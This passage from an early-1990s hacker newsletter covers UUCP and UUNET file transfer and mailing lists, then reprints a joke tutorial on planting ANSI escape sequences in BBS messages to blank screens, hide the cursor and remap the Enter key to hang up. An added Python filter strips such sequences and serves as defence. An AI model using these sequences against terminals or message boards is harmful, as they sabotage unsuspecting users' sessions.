    #W      who last edited the entry ; date edited
    #
    sitename        .domain
    sitename        remote1(FREQUENCY), remote2(FREQUENCY),
            remote3(FREQUENCY)

ARCHIVE SERVERS

There are many archive servers. These systems provide files via e-mail. For
example, the pit-manager mail server at MIT mentioned above is one. You can
get back issues of the Computer Underground Digest from the University of
Chicago archive server. To use the U. of Chicago email server, send mail
with the subject "help" (without the quotes) to:
archive-server@chsun1.spc.uchicago.edu. There are many more archive servers.

You can also get binaries using a pair of utilities called uuencode and
uudecode. These utilities convert binary code to ascii text code suitable
for transmission via e-mail (or to be posted on one of the many .binaries
newsgroups on Usenet).

MAILING LISTS

Once you have an e-mail account you can join mailing lists.
These can be the electronic equivalent of newsletters, or they can echo
mail to multiple destinations. For example, you mail a certain mail list,
and copies will be echoed to all who are on the list.

For example, you can sign up for the Phrack electronic P/H newsletter by:

    1. Send a piece of electronic mail to "LISTSERV@STORMKING.COM". The
       mail must be sent from the account where you wish Phrack to be
       delivered.
    2. Leave the "Subject:" field of that letter empty.
    3. The first line of your mail message should read:
       SUBSCRIBE PHRACK
    4. DO NOT leave your address in the name field! (This field is for
       PHRACK STAFF use only, so please use a full name)

Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com.

Incidentally, you do not have to be part of the Usenet, or the Internet
(the TCP/IP network), to participate. See the excellent article in NIA73
about e-mail gateways between networks, "Internet to Anywhere" by
Industrial Phreak.

I should also mention that with a mail account, you can still post to a
Usenet newsgroup. Send mail to @ucbvax.berkeley.edu. In the newsgroup name,
change any periods to dashes. For example, mail
alt-bbs@ucbvax.berkeley.edu to post to the alt.bbs newsgroup. If you desire
a response to your posting, be sure to put in a line like: Please e-mail
all replies.

USING UUCP TO TRANSFER FILES

The uucp program allows files to be transmitted to and from any neighboring
system, via the command line.

To "push" a file from the local machine to the remote machine:

    uucp filename.here unix!~/filename.there

To "pull" a file into a machine off the remote machine:

    uucp unix!~/filename.there filename.here

unix is used here as the name of the remote machine.

For example, you can connect to the uunet machine directly via a 1-900
number, and get access to a wealth of source code and information about the
network. Call 1-900-468-7727 and use the login "uucp" with no password.
Callers are charged 50 cents per minute. The charges appear on your phone
bill.
The file uunet!~/help contains instructions. The file uunet!~/ls-lR.Z
contains a complete list of the files available and is updated daily. Files
ending in Z need to be uncompressed before being used. The file
uunet!~/compress.tar is a tar archive containing the C sources for the
uncompress program.

1. How to reach UUNET's 900 number via uucp

Here are some sample L.sys or Systems file lines suitable for UUNET's 900
number:

    # Simple line.
    uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp
    #
    # Set up for a Telebit.
    uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT "" login: uucp

Modify as appropriate for your site, of course, to deal with your local
telephone system and uucp version. All modems on the 900 lines are Telebit
T2500s. Note that these modems first answer with V.32, then at 2400, 1200,
and last with PEP tones.

This "900" number charges $.50US per minute to the caller.

2. Where the files are

This file of instructions exists as the file uunet!~/info/archive-help.

uunet!~/ls-lR.Z contains a list of all files available. This is the
compressed output of an `ls -lR' command. This file is updated each night.
(Note this file is currently about 520 Kbytes *compressed*.)

Information on other indexes can be found in uunet!~/index/README.

The file uunet!~/info/layout details the basic organization of the archive.

3. File formats

Files with .Z endings are compressed. The uncompress program is available
in uunet!~/compress.tar if you don't have it.

Some very large files have been split into several files for you. This is
usually evidenced by sequenced endings after a .Z ending. eg:

    emacs/18.57.Z.01 .. emacs/18.57.Z.39

After you obtain all of the parts you need only concatenate them in the
proper order. eg:

    cat 18.57.Z.* > emacs-18.57.Z

UUCP File Transfer Tips

You must write files you transfer to a directory to which the user "uucp"
has write access. That user, not you, will actually do the transfer.
/usr/spool/uucppublic is the common place used.

You may see different pathnames for files in an archive which equate to the
same thing. For example, an archive that is /usr/spool/ftp (aka ~ftp) might
also be accessible as /usr/spool/uucppublic (aka ~uucp, or just ~ for UUCP).

Be sure you use absolute pathnames when specifying remote filenames. If you
don't, your working directory will be prepended to the pathname in the
command. uunet!file and uunet!~/file are different. uunet!~/ is the best
reference to the base of the archive via uucp.

Permission denied messages normally indicate a file name or file access
problem. Be sure to have the latest copy of the file list.

Beware when using shell meta-characters in transfers. You need to escape
them in most circumstances (eg: the ! in csh). Also note that there are a
number of UUCP implementations which do not handle multi-file transfers
correctly. If you pass a * to the remote system you may get 'access denied'
messages. These indicate a UUCP problem, not a file problem.

OTHER RESOURCES

In addition to the resources already mentioned, there are several books
which discuss USENET and/or UUCP maintenance. They include:

    Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2.
    Date: 1990. Pages: 210. Cost: $24.95

    Managing UUCP and Usenet; Tim O'Reilly and Grace Todino;
    ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95

    Both are "Nutshell" handbooks. O'Reilly and Associates: 981 Chestnut
    Street, Newton MA 02164 USA, 1-800-338-NUTS.
    E-mail: ...!uunet!ora!nuts

    Unix Communications; Bart Anderson, Barry Costales, and Harry
    Henderson; The Waite Group. ISBN 0-672-22773-8. Date: 1991.
    Pages: 736. Cost: $29.95. Covers everything the end user needs to know
    about email, USENET and UUCP.

------------------------------------------------------------------------------

                             ------------------
                             | Article 8 of 8 |
                             ------------------

To: hackers@tsf.UUCP
Subject: Text phile 3.
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground

Welcome, Kiddies...
To another jam packed fun day at... The BBC's crash house...

Today's secret word is 'ANSI'... Yes after this lesson whenever a
sysop/user hears the word 'ANSI', They will scream real loud!!!

First let's ask our friend Crashy a question... Crashy, do you use a term
package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have the driver
'ANSI.sys' [AAAAHHHHH] loaded in your config.sys???

'Well... Yes, I guess'...

Good, See kiddies everyone uses it but few understand it... An that is how
we will play with the users of a bbs's mind as well as the sysops [usually
not much of one here]...

First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method of
controlling IO on remote systems... It uses escape sequences to do
everything from moving the cursor around and changing color of the text to
redefining the keyboard keys... A very useful tool for helping computer
users and making nice displays.. An a cheap shot as far as hacking games
go... But that never stopped us before... For what if some devious minds
were to put them to use??? An we are just the ones to do it...

Also for those who don't know, [ESC] stands for the escape char. [0x1b] or
to type it in remote hold down the ALT key while typing 27 on the numeric
key pad then release the ALT key...

Let's start with a classic... We all know to change the text color you use
the sequence 'ESC[;;...m' and it will change the color for all following
text till it is used again... Well what if one uses the command
'ESC[0;8m'... This would cause the ANSI [AAAAHHHHH] driver to reset the
color to default then set the screen to black text on a black background...
What a glorious sight (or lack of there) when the computer just seems to
stop... No text no nothing... An if they don't reset it, well.... All the
boards they call afterwards will do the same...

Or how about this one... 'ESC[=0h;=7l'... All it does is set the screen to
40 column mode and turns line wrapping off... So their eyes get a rest...
only half the calories of a regular screen and in larger portions...

Then there is the story of the farmer's 'ESC[26;0H'... Moving the cursor
off the screen and making them wait for the next prompt (if this command is
at the end of a message) that seems to never come... But you should not
tell this joke in polite company...

An of course we saved the best for last... The ol' Two Face key change...
Just use the command 'ESC[;p' and wha-la instant chaos... For example
'ESC[13;0;35p', next time the [ENTER] key is hit it changes into an ALT-H
(The hangup command for most term packages)... An we would hope you would
not use this to just redefine the whole keyboard so that what they type is
not what they get!!! That would be.... bad... An you are not a bunch of bad
boys and girls are you... We thought so...

So boys and girls... It's time to go... and remember...

    The night belongs to the hackers...
    The early hacker gets to DOS...
    A virus in the system is worth 2 trojans in the bush...
    Etc.. Etc.. Etc..

'Another fine mess' from your friends at... The BBC

----------------------------------------------------------------------
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
-=[ "Anarchy is never HAVING to say you're sorry." ]=-
------------------------------------------------------------------------------

That's all folks...keep that e-mail coming!

------------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-= Max Cray =-
Internet: underg!max@uunet.uu.net                    Support
UUCP: ...!uunet!idsvax!underg!max                    Free
Data: The Underground Computing Foundation BBS       Software
401-847-2603 -=- 9600 baud (v.32)                    (w/src)
CI$: 76334,2203
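
For sysops and term-package authors on the receiving end of the sequences in
Article 8: the filter below is an added example, not part of the original
issue or of any BBS package named in it. It keeps colour attributes and
removes every other escape sequence from an untrusted message body; the
attribute allowlist and the name sanitize are assumptions of this example.

```python
import re

ESC = "\x1b"
# ESC, then optionally "[", parameters and a final letter. Parameters may be
# digits, ";", "=", "?" or double-quoted strings (the key-reassignment form).
SEQ = re.compile(r'\x1b(?:\[((?:"[^"]*"|[0-9;=?])*)([A-Za-z@]))?')

# Assumed site policy: colour and emphasis attributes only. Attribute 8
# (concealed) is excluded because it hides all following text.
SAFE_SGR = {"", "0", "1", "4", "5", "7"}
SAFE_SGR |= {str(n) for n in range(30, 38)}   # foreground colours
SAFE_SGR |= {str(n) for n in range(40, 48)}   # background colours


def sanitize(text):
    """Return (clean_text, findings) for one untrusted message body."""
    findings = []

    def rewrite(match):
        seq, params, final = match.group(0), match.group(1), match.group(2)
        if final is None:
            # ESC that does not start a sequence we can parse: removing the
            # ESC byte leaves the rest as inert printable text.
            findings.append(("stray-esc", seq))
            return ""
        if final != "m":
            # Cursor moves, mode set/reset (h, l), key reassignment (p), ...
            findings.append(("dropped", seq))
            return ""
        parts = params.split(";")
        kept = [p for p in parts if p in SAFE_SGR]
        if kept == parts:
            return seq
        findings.append(("unsafe-sgr", seq))
        return ESC + "[" + ";".join(kept) + "m" if kept else ""

    return SEQ.sub(rewrite, text), findings


# Constructed sample message using the sequences quoted in the article.
SAMPLE = ("Hi \x1b[1;33mthere\x1b[0m\x1b[0;8m hidden "
          "\x1b[13;0;35p\x1b[26;0H end\x1b")

if __name__ == "__main__":
    clean, findings = sanitize(SAMPLE)
    print(repr(clean))
    for kind, seq in findings:
        print(kind, repr(seq))
```

The findings list is meant for the board's log, so a sysop can see which
caller posted what. A stricter policy would also compare foreground against
background, since a pair such as 30;40 hides text just as attribute 8 does.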